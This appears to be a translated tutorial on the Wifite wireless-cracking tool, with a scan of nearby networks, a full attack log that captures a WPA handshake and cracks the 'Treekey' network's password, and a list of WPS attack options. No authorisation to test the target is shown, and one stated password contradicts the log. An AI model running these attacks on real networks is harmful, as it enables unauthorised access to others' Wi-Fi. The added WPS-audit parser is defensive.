The tool we are trying out today is Wifite. It advertises that a single simple command, with no tedious steps or extra parameters, is enough to scan for and crack Wi-Fi passwords automatically, and it supports several standards: WEP, WPA and WPS. Without further ado, let's get started.
Wifite lives under Kali's 06-Wireless Attacks category; running it directly shows how it is used:
sudo wifite
The output can be read in several blocks. The first block shows basic information about the tool, including the version and author, and also lists any recommended packages that some stages rely on but which are not installed:
. .
.´ · . . · `. wifite2 2.5.2
: : : (¯) : : : a wireless auditor by @derv82
`. · ` /¯\ ´ · .´ maintained by kimocoder
` /¯¯¯\ ´ https://github.com/kimocoder/wifite2
[!] Warning: Recommended app bully was not found. install @ https://github.com/aanarchyy/bully
[!] Warning: Recommended app pyrit was not found. install @ https://github.com/JPaulMora/Pyrit/wiki
[!] Warning: Recommended app hashcat was not found. install @ https://hashcat.net/hashcat/
[!] Warning: Recommended app hcxdumptool was not found. install @ https://github.com/ZerBea/hcxdumptool
[!] Warning: Recommended app hcxpcaptool was not found. install @ https://github.com/ZerBea/hcxtools
[!] Warning: Recommended app macchanger was not found. install @ apt-get install macchanger
The next block concerns putting the interface into monitor mode, which is why the NetworkManager process is stopped:
[!] Conflicting processes: avahi-daemon (PID 635), NetworkManager (PID 640), wpa_supplicant (PID 673), avahi-daemon (PID 698)
[!] If you have problems: kill -9 PID or re-run wifite with --kill
[+] Using wlp2s0mon already in monitor mode
It then enters the scanning phase. You can press Ctrl + C at any point to stop the scan, after which Wifite asks which target to attack; here I entered 3, the Treekey access point:
NUM                      ESSID   CH   ENCR  POWER  WPS?  CLIENT
---  -------------------------  ---  -----  -----  ----  ------
  1  ken-2.4G                     1  WPA-P   43db    no
  2  cheng1230                    6  WPA-P   43db    no
  3  Treekey                     13  WPA-P   22db  lock       1
  4  LIANG                       11  WPA-P   22db    no
  5  chandler                     6  WPA-P   22db    no
  6  ASUS 2.4G                    6  WPA-P   17db  lock
  7  dong4                        1  WPA-P   16db   yes
  8  huangfamily-2.4G             1  WPA-P   16db   yes
[+] select target(s) (1-16) separated by commas, dashes or all: 3
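As an added example (not part of the original post or of the Wifite project), the following Python parses the scan table Wifite prints above into records and lists the networks that still advertise WPS (the "yes" and "lock" rows). From the defender's side that list is what matters: the Pixie-Dust and PIN stages in the attack log below only apply while WPS is enabled, so it should be switched off on any of your own access points that appear there. The column layout comes from the output above; the Network class, ROW_RE and the two function names are my own.

```python
import re
from dataclasses import dataclass

# One scan-table row. The ESSID may contain spaces ("ASUS 2.4G"), so it is
# captured non-greedily and the fixed columns are anchored to its right.
ROW_RE = re.compile(
    r"^\s*(?P<num>\d+)\s+(?P<essid>.+?)\s+(?P<ch>\d+)\s+(?P<encr>\S+)"
    r"\s+(?P<power>\d+)db\s+(?P<wps>yes|no|lock)(?:\s+(?P<clients>\d+))?\s*$"
)

@dataclass
class Network:
    num: int
    essid: str
    channel: int
    encryption: str
    power_db: int
    wps: str       # "yes", "no" or "lock", exactly as Wifite prints it
    clients: int   # 0 when the CLIENT column is blank

def parse_scan_table(text: str) -> list[Network]:
    """Parse the NUM/ESSID/CH/ENCR/POWER/WPS?/CLIENT table. The header and
    separator lines do not match the row pattern and are skipped."""
    networks = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            networks.append(Network(
                int(m["num"]), m["essid"], int(m["ch"]), m["encr"],
                int(m["power"]), m["wps"], int(m["clients"] or 0)))
    return networks

def wps_exposed(networks: list[Network]) -> list[str]:
    """ESSIDs that still advertise WPS ("yes" or "lock"); only these are
    reachable by the WPS stages, so WPS should be disabled on your own ones."""
    return [n.essid for n in networks if n.wps != "no"]

# Constructed sample: a subset of the scan table shown in the post.
SAMPLE = """\
NUM                      ESSID   CH   ENCR  POWER  WPS?  CLIENT
---  -------------------------  ---  -----  -----  ----  ------
  1  ken-2.4G                     1  WPA-P   43db    no
  3  Treekey                     13  WPA-P   22db  lock       1
  6  ASUS 2.4G                    6  WPA-P   17db  lock
  7  dong4                        1  WPA-P   16db   yes
"""

if __name__ == "__main__":
    for essid in wps_exposed(parse_scan_table(SAMPLE)):
        print("WPS still enabled on:", essid)
```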
Next comes the series of cracking attempts. At the end it produces a .cap file and cracked.txt, and you can see that the password 111111 was recovered:
[+] (1/1) Starting attacks against AA:AA:AA:AA:AA:AA (Treekey)
[+] Treekey (50db) WPS Pixie-Dust: [4m56s] Failed: Because access point is Locked
[+] Treekey (54db) WPS NULL PIN: [4m56s] Failed: Because access point is Locked
[+] Treekey (44db) WPS PIN Attack: [5s] Failed: Because access point is Locked
[!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcaptool
[+] Treekey (47db) WPA Handshake capture: Discovered new client: AA:AA:AA:AA:AA:AA
[+] Treekey (45db) WPA Handshake capture: Captured handshake
[+] saving copy of handshake to hs/handshake_Treekey_2021-10-12T21-22-06.cap saved
[+] analysis of captured handshake file:
[+] tshark: .cap file contains a valid handshake for AA:AA:AA:AA:AA:AA
[!] aircrack: .cap file does not contain a valid handshake
[+] Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist
[+] Cracking WPA Handshake: 0.01% ETA: 1m47s @ 1898.7kps (current key: 11111111)
[+] Cracked WPA Handshake PSK: 11111111
[+] Access Point Name: Treekey
[+] Access Point BSSID: AA:AA:AA:AA:AA:AA
[+] Encryption: WPA
[+] Handshake File: hs/handshake_Treekey_2021-10-12T21-22-06.cap
[+] PSK (password): 11111111
[+] saved crack result to cracked.txt (1 total)
[+] Finished attacking 1 target(s), exiting
That is the simplest way to use Wifite. Other usages can be found with wifite -h, for example the options that target a specific mode:
WEP:
--wep                Show only WEP-encrypted networks
--require-fakeauth   Fails attacks if fake-auth fails (default: off)
--keep-ivs           Retain .IVS files and reuse when cracking (default: off)
WPA:
--wpa                Show only WPA-encrypted networks (includes WPS)
--new-hs             Captures new handshakes, ignores existing handshakes in hs (default: off)
--dict [file]        File containing passwords for cracking (default: /usr/share/dict/wordlist-probable.txt)
WPS:
--wps                Show only WPS-enabled networks
--wps-only           Only use WPS PIN & Pixie-Dust attacks (default: off)
--bully              Use bully program for WPS PIN & Pixie-Dust attacks (default: reaver)
--reaver             Use reaver program for WPS PIN & Pixie-Dust attacks (default: reaver)
--ignore-locks       Do not stop WPS PIN attack if AP becomes locked (default: stop)